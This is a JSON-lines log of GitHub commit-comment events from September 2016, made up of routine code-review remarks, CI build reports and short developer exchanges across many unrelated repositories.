{"id":"4543248222","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/homework-city"},"payload":{"comment":{"id":18972118,"position":16,"line":16,"path":"js/citipix.js","commit_id":"656656408b38b40e6d63d8ef59d4ba7fe2331683","created_at":"2016-09-10T01:50:31Z","updated_at":"2016-09-10T01:50:31Z","body":"You are definitely on the right track here, couple things though...\r\n```\r\nif (city == \"New York\" || \"New York City\" || \"NYC\"){\r\n\r\nactually needs to be written like:\r\n\r\nif (city == \"New York\" ||(city ==  \"New York City\" ||(city ==   \"NYC\"){\r\n```\r\nThis is because the first way is actually asking, \"if the value of the city variable is equal to \"New York\", or \"New York City\" is true or \"NYC\" is true.  If we ask if a particular String is true, the answer will be \"yes\".  \r\n\r\nThe second thing I wanted to point out is that you would actually want to write these as `if/else if/else `statements...a main reason being that if you do, then once one of those conditions is met, the code will stop executing.  When presented with different \"if\" statements, each \"question\" will be asked every time the function runs. \r\n\r\nAgain, you are definitely on the right track with all of this!\r\n\r\n"}},"created_at":"2016-09-10T01:50:31Z"}
{"id":"4543248526","type":"CommitCommentEvent","actor":{"login":"aaasen"},"repo":{"name":"socrata/odn-backend"},"payload":{"comment":{"id":18972121,"position":null,"line":null,"path":null,"commit_id":"fd4a3b630e8cd2f72fd495b36b2920e6f3a207b6","created_at":"2016-09-10T01:50:44Z","updated_at":"2016-09-10T01:50:44Z","body":"This isn't necessary. `odn.data.socrata.com` is already added to any dataset that doesn't specify a domain. See here: http://api.opendatanetwork.com/data/v1/availability?entity_id=0400000US53&app_token=CqcTvF7wVsI8IYAq7CdZszLbU"}},"created_at":"2016-09-10T01:50:44Z"}
{"id":"4543249247","type":"CommitCommentEvent","actor":{"login":"patricknelson"},"repo":{"name":"chrometoasters/silverstripe-gridfieldlimititems"},"payload":{"comment":{"id":18972123,"position":null,"line":null,"path":null,"commit_id":"fd7c54455147ffe7f72133f29a17a1dce51a198d","created_at":"2016-09-10T01:51:20Z","updated_at":"2016-09-10T01:51:20Z","body":"Same for this too. Could you submit a PR for this? Looks like this could be useful."}},"created_at":"2016-09-10T01:51:20Z"}
{"id":"4543250137","type":"CommitCommentEvent","actor":{"login":"patricknelson"},"repo":{"name":"chrometoasters/silverstripe-gridfieldlimititems"},"payload":{"comment":{"id":18972124,"position":null,"line":null,"path":null,"commit_id":"fd7c54455147ffe7f72133f29a17a1dce51a198d","created_at":"2016-09-10T01:52:02Z","updated_at":"2016-09-10T01:52:02Z","body":"Oops, you're probably not Michael -- see my comment here: https://github.com/chrometoasters/silverstripe-gridfieldlimititems/commit/479540712cd32131b030bb70f4cf2d57fcb72b55"}},"created_at":"2016-09-10T01:52:02Z"}
{"id":"4543250435","type":"CommitCommentEvent","actor":{"login":"Daniel15"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":18972125,"position":null,"line":null,"path":null,"commit_id":"e5b9c92d3d20859c6aefdcc9df2f757dbe137b8e","created_at":"2016-09-10T01:52:16Z","updated_at":"2016-09-10T01:52:16Z","body":"Wow, that repo https://github.com/babel/phabricator-redirects is an... interesting approach. One directory per issue! :stuck_out_tongue: Seems like it would have been simpler to have a single .php file + a JSON file mapping from old ID to new ID.\r\n\r\nAnyways, thanks for the link :smile: "}},"created_at":"2016-09-10T01:52:16Z"}
{"id":"4543251680","type":"CommitCommentEvent","actor":{"login":"kbtbc"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18972127,"position":null,"line":null,"path":null,"commit_id":"73c68b2902a628483340b165378b2f6f167c3956","created_at":"2016-09-10T01:53:07Z","updated_at":"2016-09-10T01:53:07Z","body":"@phil0079 have you seen this tool?  Hex Behive Generator: https://beehive.bessei-it.eu/\r\n(why is this not in the Tools/Extra in the Wiki?)\r\n\r\n\r\nAlso, this whole beehive scanning vs. config.ini is a spaghetti monster.   I've been beehive scanning for over a week and still get confused sometimes. \r\n\r\nCan someone help clarify these issues in docs? \r\n1) How do multiple users listed in the config.ini file apply to the separate beehive instances?  If you have multiple users in the config.ini, does it assign one at a time to the beehive instances, or do the beehive instances need their own unique user lists (currently what I'm doing with the -w flag in each instance) ...   If users in config.ini doesn't apply at all, this should be added to the docs (and it should not throw an error when you use the -w in each beehive instance that doesn't add up #of users listed in the config.ini).   \r\n\r\n2)  How does listing multiple proxies in the config.ini work w/ the beehive configuration?\r\n"}},"created_at":"2016-09-10T01:53:07Z"}
{"id":"4543252360","type":"CommitCommentEvent","actor":{"login":"patricknelson"},"repo":{"name":"chrometoasters/silverstripe-gridfieldlimititems"},"payload":{"comment":{"id":18972129,"position":null,"line":null,"path":null,"commit_id":"712fbb6c55fe99ab93f29dbe39a4dfe4b846484c","created_at":"2016-09-10T01:53:38Z","updated_at":"2016-09-10T01:53:38Z","body":"+1 for this too. Would be useful :sunglasses::+1: "}},"created_at":"2016-09-10T01:53:38Z"}
{"id":"4543256887","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":18972137,"position":null,"line":null,"path":null,"commit_id":"c88478c5c4b73eedfbe314dd71386b668bd4c3ea","created_at":"2016-09-10T01:57:11Z","updated_at":"2016-09-10T01:57:11Z","body":"Lots of options for sure. Probably still worth pushing for now."}},"created_at":"2016-09-10T01:57:11Z"}
{"id":"4543259674","type":"CommitCommentEvent","actor":{"login":"demoneaux"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18972142,"position":null,"line":null,"path":null,"commit_id":"427be6a77febc2640ce32081481b83a2cff3161f","created_at":"2016-09-10T01:59:11Z","updated_at":"2016-09-10T01:59:11Z","body":"Using time of generation typically isn't a good idea for most sites, but since most of the site content is static, and only the CSS/JS changes, this should be fine :)"}},"created_at":"2016-09-10T01:59:11Z"}
{"id":"4543259971","type":"CommitCommentEvent","actor":{"login":"JingwenXIE"},"repo":{"name":"JingwenXIE/Nine-Patch-Layout"},"payload":{"comment":{"id":18972143,"position":3,"line":3,"path":"nine-patch.css","commit_id":"5b522a1600e0f99f236363af3c4e3e7ba16066d3","created_at":"2016-09-10T01:59:23Z","updated_at":"2016-09-10T01:59:23Z","body":"it's invalid."}},"created_at":"2016-09-10T01:59:23Z"}
{"id":"4543811833","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":18973223,"position":52,"line":378,"path":"src/gl/scene/gl_sprite.cpp","commit_id":"30cb651d9241a54c3d808850a992866829e1ad60","created_at":"2016-09-10T10:03:03Z","updated_at":"2016-09-10T10:03:03Z","body":"`actor` can be `nullptr` here. Was the empty branch \"reserved\" for future use?"}},"created_at":"2016-09-10T10:03:03Z"}
{"id":"4543813006","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973224,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T10:04:02Z","updated_at":"2016-09-10T10:04:02Z","body":"But even for you there should be several parts of the address, that are useless. It would be helpful, if you can tell me, which parts exactly.\r\n\r\nLike in part1, part2, part3.... the part numbers."}},"created_at":"2016-09-10T10:04:02Z"}
{"id":"4543813121","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"manvig-optimus/Csharp-Assignments"},"payload":{"comment":{"id":18973225,"position":85,"line":85,"path":"Vehicle_Assignment9/Vehicle_Assignment9/Program.cs","commit_id":"c0810780b8c6505a09f458c18ac2f2e5e9e264d8","created_at":"2016-09-10T10:04:09Z","updated_at":"2016-09-10T10:04:09Z","body":"Ternary operator can be used to shorten the code."}},"created_at":"2016-09-10T10:04:09Z"}
{"id":"4543817184","type":"CommitCommentEvent","actor":{"login":"BosNaufal"},"repo":{"name":"BosNaufal/react-scrollbar"},"payload":{"comment":{"id":18973231,"position":null,"line":null,"path":null,"commit_id":"c57a8f84092c2a2a2c3463e822009f82a5436af5","created_at":"2016-09-10T10:07:26Z","updated_at":"2016-09-10T10:07:26Z","body":"@UsulPro Thanks~ :grin: "}},"created_at":"2016-09-10T10:07:26Z"}
{"id":"4543817339","type":"CommitCommentEvent","actor":{"login":"alex011235"},"repo":{"name":"alex011235/FaceSwap"},"payload":{"comment":{"id":18973232,"position":null,"line":null,"path":null,"commit_id":"bbd2d6e05015f4f15a27461770e5778f3c4abf07","created_at":"2016-09-10T10:07:34Z","updated_at":"2016-09-10T10:07:34Z","body":"I don't know what has happened. If nonone can suggest a solution to this problem, it will take a while to debug. It's very strange, it suddenly stopped working."}},"created_at":"2016-09-10T10:07:34Z"}
{"id":"4543819728","type":"CommitCommentEvent","actor":{"login":"rdlabo"},"repo":{"name":"codeigniter-jp/codeigniter-jp.github.io"},"payload":{"comment":{"id":18973234,"position":null,"line":null,"path":null,"commit_id":"4e94e778cf9095885d50751517adfc6800ff5923","created_at":"2016-09-10T10:09:34Z","updated_at":"2016-09-10T10:09:34Z","body":"こちら、少し悩んだ点でもあるのですが\r\n\r\n- 2系ドキュメントのURLがSEOで強すぎる\r\n- 3系と2系を混合して、動かないと相談を受けること多々（→ SEOに引っかかるからこその学習コスト）\r\n- すでに2系はサポートが終了している\r\n- 2系をskipしたとしても、NEKOGETさんの翻訳の方がSEOに強く、ユーザ会ドキュメントがでてこない\r\n\r\nこういう中ですので、\r\n\r\n- 2系は過去であって、3系ドキュメントが最新（同一バージョン違い）\r\n- 検索インデックスからむしろ消さないと、3系があがってこないし、変な学習コストが生じる\r\n　\r\nという判断で、canonicalタグを追加した次第です。\r\n「PHPフレームワーク」でCodeigniterに辿り着いた方への機会損失ではなく、Codeigniterを使ってる人に「過去のバージョンを提供して混乱を生じさせる（もしくは3系より情報不足）」という現状の改善の意図となっております。"}},"created_at":"2016-09-10T10:09:34Z"}
{"id":"4543821074","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973235,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T10:10:42Z","updated_at":"2016-09-10T10:10:42Z","body":"I didn't know the parts could be spit up. Usually the push notification is truncated anyway.\r\nBut if you're counting commas, usually up to part3.\r\nThe amount of information seems to vary.\r\nNumber, Street, Suburb\r\nStreet, Suburb\r\nPOI, Suburb\r\nPOI, Street, Suburb\r\n\r\nFollowing all that, there is the (useless) City, Council, State, Postcode, Country."}},"created_at":"2016-09-10T10:10:42Z"}
{"id":"4543823437","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18973238,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T10:12:45Z","updated_at":"2016-09-10T10:12:45Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1762 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T10:12:45Z"}
{"id":"4543823819","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18973239,"position":13,"line":71,"path":"lesson_9/modules.rb","commit_id":"00509708691f9919d6379c435fbfa6aba92ecf51","created_at":"2016-09-10T10:13:08Z","updated_at":"2016-09-10T10:13:08Z","body":"Ты модуль ClassMethods подключаешь через extend, в этом случае инстанс-методы и инстанс-переменные становятся переменными класса. Т.е. нужно объявить обычную инстанс-переменную @validation_rules и attr_accessor для нее. А в методах InstanceMethods обращаться к геттеру через self.class"}},"created_at":"2016-09-10T10:13:08Z"}
{"id":"4543823841","type":"CommitCommentEvent","actor":{"login":"psygnisfive"},"repo":{"name":"psygnisfive/basic-proof-development"},"payload":{"comment":{"id":18973240,"position":null,"line":null,"path":null,"commit_id":"8ff41ad6a08e71ccd7b3aec3f2ca8bc0f0e25ae1","created_at":"2016-09-10T10:13:09Z","updated_at":"2016-09-10T10:13:09Z","body":"Regarding state, it's not too magical. At it's core, a value `State s a` is a function `s -> (a,s)`, that is, given some state value, it computes a new state value paired with some \"return value\", so to speak. The state value can be a number, as in a loop, or maybe a collection of assignments of values to names (as with stateful variables) or maybe some input that you're consuming, or whatever.\r\n\r\n`StateT s m a` is `s -> m (a,s)`, and all it does is include m-like computations. In this case, m is Maybe, so we have a stateful computation that might fail to compute a next state and value. The monad instances let us hide everything behind the monadic interface, and state comes with two main stateful computations: `get` gets the current state value, and `put` stores a new state value.\r\n\r\nIn the context of tactic scripts, the state we're computing over is a bunch of hypothetical judgments that represent the current proof problem we're working on. As we use tactics, we decompose the first problem on the list into sub-problems. Effectively, we've built a kind of representation of a call stack for the type checking process out of concrete data. Alternatively, an in-order traversal of a derivation tree that we're building on the fly as we traverse."}},"created_at":"2016-09-10T10:13:09Z"}
{"id":"4543824272","type":"CommitCommentEvent","actor":{"login":"thomasdalbert"},"repo":{"name":"thomasdalbert/GraphPathFinder"},"payload":{"comment":{"id":18973241,"position":42,"line":40,"path":"src/main/java/client/controller/GraphFileGenerator.java","commit_id":"a4cd94d65617a6e9b467309fdb0aeace4cac1870","created_at":"2016-09-10T10:13:30Z","updated_at":"2016-09-10T10:13:30Z","body":"Charge somebody else of this responsibility."}},"created_at":"2016-09-10T10:13:30Z"}
{"id":"4543824422","type":"CommitCommentEvent","actor":{"login":"wyldeNfreee"},"repo":{"name":"secgroundzero/warberry"},"payload":{"comment":{"id":18973242,"position":null,"line":null,"path":null,"commit_id":"96ee9204f48ae1d4995c11b87e013e36497e25dc","created_at":"2016-09-10T10:13:39Z","updated_at":"2016-09-10T10:13:39Z","body":"How do I install this "}},"created_at":"2016-09-10T10:13:39Z"}
{"id":"4543824943","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18973243,"position":19,"line":77,"path":"lesson_9/modules.rb","commit_id":"00509708691f9919d6379c435fbfa6aba92ecf51","created_at":"2016-09-10T10:14:08Z","updated_at":"2016-09-10T10:14:08Z","body":"Это другая переменная, не из модуля ClassMethods, соотвтетсвенно в ней просто пустой хеш."}},"created_at":"2016-09-10T10:14:08Z"}
{"id":"4543826595","type":"CommitCommentEvent","actor":{"login":"thomasdalbert"},"repo":{"name":"thomasdalbert/GraphPathFinder"},"payload":{"comment":{"id":18973244,"position":8,"line":8,"path":"src/main/java/client/model/util/MathUtil.java","commit_id":"a4cd94d65617a6e9b467309fdb0aeace4cac1870","created_at":"2016-09-10T10:15:30Z","updated_at":"2016-09-10T10:15:30Z","body":"Would be a great place for ternary here."}},"created_at":"2016-09-10T10:15:30Z"}
{"id":"4543826629","type":"CommitCommentEvent","actor":{"login":"rohkea"},"repo":{"name":"carstene1ns/easyrpg-player"},"payload":{"comment":{"id":18973245,"position":null,"line":null,"path":null,"commit_id":"55c4add10827e1d09b4efb39696cb32c9834ee5e","created_at":"2016-09-10T10:15:32Z","updated_at":"2016-09-10T10:15:32Z","body":"Hello! Sorry, please update it again, I've found a more idiomatic translation for 'navigational drawer'. ^^'"}},"created_at":"2016-09-10T10:15:32Z"}
{"id":"4543827007","type":"CommitCommentEvent","actor":{"login":"thomasdalbert"},"repo":{"name":"thomasdalbert/GraphPathFinder"},"payload":{"comment":{"id":18973246,"position":9,"line":9,"path":"src/main/java/client/model/util/MathUtil.java","commit_id":"a4cd94d65617a6e9b467309fdb0aeace4cac1870","created_at":"2016-09-10T10:15:51Z","updated_at":"2016-09-10T10:15:51Z","body":"Would be a great place for ternary here."}},"created_at":"2016-09-10T10:15:51Z"}
{"id":"4543827739","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18973247,"position":null,"line":null,"path":null,"commit_id":"b7f607cacea4ead5721a032c42f68f0afada5112","created_at":"2016-09-10T10:16:27Z","updated_at":"2016-09-10T10:16:27Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7f607cacea4ead5721a032c42f68f0afada5112-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7f607cacea4ead5721a032c42f68f0afada5112-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-10T10:16:27Z"}
{"id":"4543827789","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"loco-loco/Stockfish"},"payload":{"comment":{"id":18973248,"position":null,"line":null,"path":null,"commit_id":"0f3ed707259c73c00203b4fb5f22c0e347d8070a","created_at":"2016-09-10T10:16:30Z","updated_at":"2016-09-10T10:16:30Z","body":"Why has the same test been submitted twice?"}},"created_at":"2016-09-10T10:16:30Z"}
{"id":"4543828230","type":"CommitCommentEvent","actor":{"login":"ja11sop"},"repo":{"name":"HowardHinnant/date"},"payload":{"comment":{"id":18973249,"position":null,"line":null,"path":null,"commit_id":"59d9cfa96dcd407308c6eaf5f8dc3ae612d117a3","created_at":"2016-09-10T10:16:56Z","updated_at":"2016-09-10T10:16:56Z","body":"FYI - this commit breaks g++6.2 and clang 3.9, presumably other versions also - sample clang error:\r\n```\r\ndate.h:1066:7: error: no member named 'floor' in namespace 'std::chrono'; did you mean '::floor'?\r\nusing std::chrono::floor;\r\n      ^~~~~~~~~~~~~~~~~~\r\n      ::floor\r\n/usr/include/x86_64-linux-gnu/bits/mathcalls.h:184:14: note: '::floor' declared here\r\n__MATHCALLX (floor,, (_Mdouble_ __x), (__const__));\r\n```\r\nCompiled using `-std=c++1z` on Linux, *not* using `libc++`. Writing a comment as I've just hit this on our builds and not fully investigated yet and seems fairly self-explanatory. I expect this is too agressive, `|| __cplusplus <= 201402`"}},"created_at":"2016-09-10T10:16:56Z"}
{"id":"4543830631","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18973251,"position":null,"line":null,"path":null,"commit_id":"b7f607cacea4ead5721a032c42f68f0afada5112","created_at":"2016-09-10T10:18:56Z","updated_at":"2016-09-10T10:18:56Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7f607cacea4ead5721a032c42f68f0afada5112-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7f607cacea4ead5721a032c42f68f0afada5112-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-10T10:18:56Z"}
{"id":"4543833029","type":"CommitCommentEvent","actor":{"login":"LemADEC"},"repo":{"name":"LemADEC/WarpDrive"},"payload":{"comment":{"id":18973253,"position":null,"line":null,"path":null,"commit_id":"b457bca93487e8a8cd01e235cb511cea95424a74","created_at":"2016-09-10T10:21:00Z","updated_at":"2016-09-10T10:21:00Z","body":"The time factor is only a warning since there's quite a few mods that do 'instant block breaking'.\r\nWith a Fortune 3 pickaxe you'll recover most components.\r\n\r\nA plasma welder is in the plan for 1.10."}},"created_at":"2016-09-10T10:21:00Z"}
{"id":"4543834132","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18973254,"position":null,"line":null,"path":null,"commit_id":"f476723739a2bce1f96c18eda78bad6c16b21b7c","created_at":"2016-09-10T10:21:59Z","updated_at":"2016-09-10T10:21:59Z","body":"Didn't want to commit this to master, ahem, but hopefully good. @oskomonzon @nahojjjen ? That's to avoid things like:\r\n\r\n![2016-09-09 22 28 16](https://cloud.githubusercontent.com/assets/289960/18409812/2236efb6-7751-11e6-8b3e-a52c1dbc4faa.png)\r\n"}},"created_at":"2016-09-10T10:21:59Z"}
{"id":"4543834197","type":"CommitCommentEvent","actor":{"login":"TomMalbran"},"repo":{"name":"TeamPorcupine/ProjectPorcupine"},"payload":{"comment":{"id":18973255,"position":3,"line":525,"path":"Assets/Scripts/Models/Utility.cs","commit_id":"447d7d805131be8d66e65501f8b6ee46f5e3b4be","created_at":"2016-09-10T10:22:02Z","updated_at":"2016-09-10T10:22:02Z","body":"You can remove this now?"}},"created_at":"2016-09-10T10:22:02Z"}
{"id":"4543834303","type":"CommitCommentEvent","actor":{"login":"woodforda"},"repo":{"name":"woodforda/vocabulary-server"},"payload":{"comment":{"id":18973256,"position":null,"line":null,"path":null,"commit_id":"7b07bb6a1418b153cec27576c78ee941e97484ac","created_at":"2016-09-10T10:22:08Z","updated_at":"2016-09-10T10:22:08Z","body":"Sadly this commit is confused.  Should have been on issue #3 - will have to live with it :("}},"created_at":"2016-09-10T10:22:08Z"}
{"id":"4543834322","type":"CommitCommentEvent","actor":{"login":"mochal97"},"repo":{"name":"mochal97/HelloGit"},"payload":{"comment":{"id":18973257,"position":null,"line":null,"path":null,"commit_id":"51993f3bdd426ebd40d3f28b7edb47b3b5c288ae","created_at":"2016-09-10T10:22:09Z","updated_at":"2016-09-10T10:22:09Z","body":"Mochammad Alauddin Almuayyad\r\nXIRPL6\r\n19\r\n4753/1472070\r\nSMK Telkom Malang"}},"created_at":"2016-09-10T10:22:09Z"}
{"id":"4543834529","type":"CommitCommentEvent","actor":{"login":"knightliao"},"repo":{"name":"knightliao/disconf"},"payload":{"comment":{"id":18973258,"position":null,"line":null,"path":null,"commit_id":"94f511e4a33895f21dd10ce10dfccfeed21b84dc","created_at":"2016-09-10T10:22:18Z","updated_at":"2016-09-10T10:22:18Z","body":"哈哈，周末没事撸点文档。"}},"created_at":"2016-09-10T10:22:18Z"}
{"id":"4543834545","type":"CommitCommentEvent","actor":{"login":"nirbheek"},"repo":{"name":"mesonbuild/meson"},"payload":{"comment":{"id":18973259,"position":null,"line":null,"path":null,"commit_id":"0188aa27ae00f24bc5ae6b77feca307e62e79f22","created_at":"2016-09-10T10:22:20Z","updated_at":"2016-09-10T10:22:20Z","body":"Our static libraries are always called `libfoo.a` now, even with MSVC, so we avoid that filename collision."}},"created_at":"2016-09-10T10:22:20Z"}
{"id":"4543835171","type":"CommitCommentEvent","actor":{"login":"knightliao"},"repo":{"name":"knightliao/disconf"},"payload":{"comment":{"id":18973260,"position":null,"line":null,"path":null,"commit_id":"94f511e4a33895f21dd10ce10dfccfeed21b84dc","created_at":"2016-09-10T10:22:59Z","updated_at":"2016-09-10T10:22:59Z","body":"@kevin1117 哈哈，周末没事撸点文档。"}},"created_at":"2016-09-10T10:22:59Z"}
{"id":"4543837619","type":"CommitCommentEvent","actor":{"login":"thomasdalbert"},"repo":{"name":"thomasdalbert/GraphPathFinder"},"payload":{"comment":{"id":18973262,"position":5,"line":5,"path":"src/main/java/client/model/util/MathUtil.java","commit_id":"a4cd94d65617a6e9b467309fdb0aeace4cac1870","created_at":"2016-09-10T10:25:08Z","updated_at":"2016-09-10T10:25:08Z","body":"https://programmers.stackexchange.com/questions/235527/when-to-use-a-singleton-and-when-to-use-a-static-class#answer-235528 \r\n\r\n> \"A case where a static class might be a good idea is when you want to collect related pieces of functionality, but you don't need to have any internal state in any object.\"\r\n\r\nNo internal state here, just i/o. Make the class abstract and its methods static.\r\n\r\nThis class is already in the \"util\" package, why adding \"Util\" in the name then ? Don't be redundant."}},"created_at":"2016-09-10T10:25:08Z"}
{"id":"4543838061","type":"CommitCommentEvent","actor":{"login":"koosemose"},"repo":{"name":"TeamPorcupine/ProjectPorcupine"},"payload":{"comment":{"id":18973263,"position":3,"line":525,"path":"Assets/Scripts/Models/Utility.cs","commit_id":"447d7d805131be8d66e65501f8b6ee46f5e3b4be","created_at":"2016-09-10T10:25:29Z","updated_at":"2016-09-10T10:25:29Z","body":"Probably..."}},"created_at":"2016-09-10T10:25:29Z"}
{"id":"4543841859","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"loco-loco/Stockfish"},"payload":{"comment":{"id":18973264,"position":null,"line":null,"path":null,"commit_id":"0f3ed707259c73c00203b4fb5f22c0e347d8070a","created_at":"2016-09-10T10:28:54Z","updated_at":"2016-09-10T10:28:54Z","body":"@ajithcj And the same test has already been run by the author of the patch here: http://tests.stockfishchess.org/tests/view/57d35f1b0ebc59030fbe5137"}},"created_at":"2016-09-10T10:28:54Z"}
{"id":"4543845257","type":"CommitCommentEvent","actor":{"login":"nahojjjen"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18973266,"position":null,"line":null,"path":null,"commit_id":"f476723739a2bce1f96c18eda78bad6c16b21b7c","created_at":"2016-09-10T10:31:47Z","updated_at":"2016-09-10T10:31:47Z","body":"I think the potential problem here is that android:layout_weight=\"1\" tells the element to take 1/nth of the available width, where n is the total weight of all the elements in the container, and directly typing out what width it should have overwrites that to a static value. But I doubt we will ever run into a situation where this is an issue, and if we do it's easy to fix. So sure, I'm okay with this commit."}},"created_at":"2016-09-10T10:31:47Z"}
{"id":"4543845870","type":"CommitCommentEvent","actor":{"login":"ja11sop"},"repo":{"name":"HowardHinnant/date"},"payload":{"comment":{"id":18973267,"position":null,"line":null,"path":null,"commit_id":"59d9cfa96dcd407308c6eaf5f8dc3ae612d117a3","created_at":"2016-09-10T10:32:18Z","updated_at":"2016-09-10T10:32:18Z","body":"Tracking this here #81"}},"created_at":"2016-09-10T10:32:18Z"}
{"id":"4543847215","type":"CommitCommentEvent","actor":{"login":"Rifai19"},"repo":{"name":"simbelekete/AndroidExamp"},"payload":{"comment":{"id":18973272,"position":null,"line":null,"path":null,"commit_id":"98f3e4c5f40fada232f173ce9ebfd99990df5e6b","created_at":"2016-09-10T10:33:31Z","updated_at":"2016-09-10T10:33:31Z","body":"API ganti ke udj2 kris biar jadi sesuai dengan yang di sierra"}},"created_at":"2016-09-10T10:33:31Z"}
{"id":"4543847748","type":"CommitCommentEvent","actor":{"login":"FLamparski"},"repo":{"name":"miestasmia/MathGen"},"payload":{"comment":{"id":18973273,"position":null,"line":null,"path":null,"commit_id":"680414df47bbff5c8baa8b2b0d3fdf06eb0861a1","created_at":"2016-09-10T10:33:58Z","updated_at":"2016-09-10T10:33:58Z","body":"That was quick :+1:"}},"created_at":"2016-09-10T10:33:58Z"}
{"id":"4543848994","type":"CommitCommentEvent","actor":{"login":"silver13"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18973275,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-10T10:35:11Z","updated_at":"2016-09-10T10:35:11Z","body":"can you ask in the main thread please, there are other people that can help there, as well."}},"created_at":"2016-09-10T10:35:11Z"}
{"id":"4543849177","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"loco-loco/Stockfish"},"payload":{"comment":{"id":18973276,"position":null,"line":null,"path":null,"commit_id":"0f3ed707259c73c00203b4fb5f22c0e347d8070a","created_at":"2016-09-10T10:35:18Z","updated_at":"2016-09-10T10:35:18Z","body":"ok, I deleted the tests."}},"created_at":"2016-09-10T10:35:18Z"}
{"id":"4543849560","type":"CommitCommentEvent","actor":{"login":"Rifai19"},"repo":{"name":"simbelekete/AndroidExamp"},"payload":{"comment":{"id":18973278,"position":null,"line":null,"path":null,"commit_id":"98f3e4c5f40fada232f173ce9ebfd99990df5e6b","created_at":"2016-09-10T10:35:40Z","updated_at":"2016-09-10T10:35:40Z","body":"Sementara Pakai yang Mapel Java Dulu ya, yang Mapel Controller Onclicknya sudah bisa pakai ID quiz tinggal dilempar aja tapi diperbaiki dulu belum ada navbar dsb\r\n"}},"created_at":"2016-09-10T10:35:40Z"}
{"id":"4543849760","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18973279,"position":null,"line":null,"path":null,"commit_id":"f476723739a2bce1f96c18eda78bad6c16b21b7c","created_at":"2016-09-10T10:35:52Z","updated_at":"2016-09-10T10:35:52Z","body":"> I think the potential problem here is that android:layout_weight=\"1\" tells the element to take 1/nth of the available width\r\n\r\nAndroid Studio suggested otherwise: since that's the only element with a weight, it will expand to take all available space (which seems to happen) no matter what, and with a width that will just be slower. Of course the width is making a difference, but I hope Android Studio still got the weighting right."}},"created_at":"2016-09-10T10:35:52Z"}
{"id":"4543849890","type":"CommitCommentEvent","actor":{"login":"DJCrapsody"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18973280,"position":null,"line":null,"path":null,"commit_id":"f476723739a2bce1f96c18eda78bad6c16b21b7c","created_at":"2016-09-10T10:36:01Z","updated_at":"2016-09-10T10:36:01Z","body":"Shouldn't we be using match_parent?"}},"created_at":"2016-09-10T10:36:01Z"}
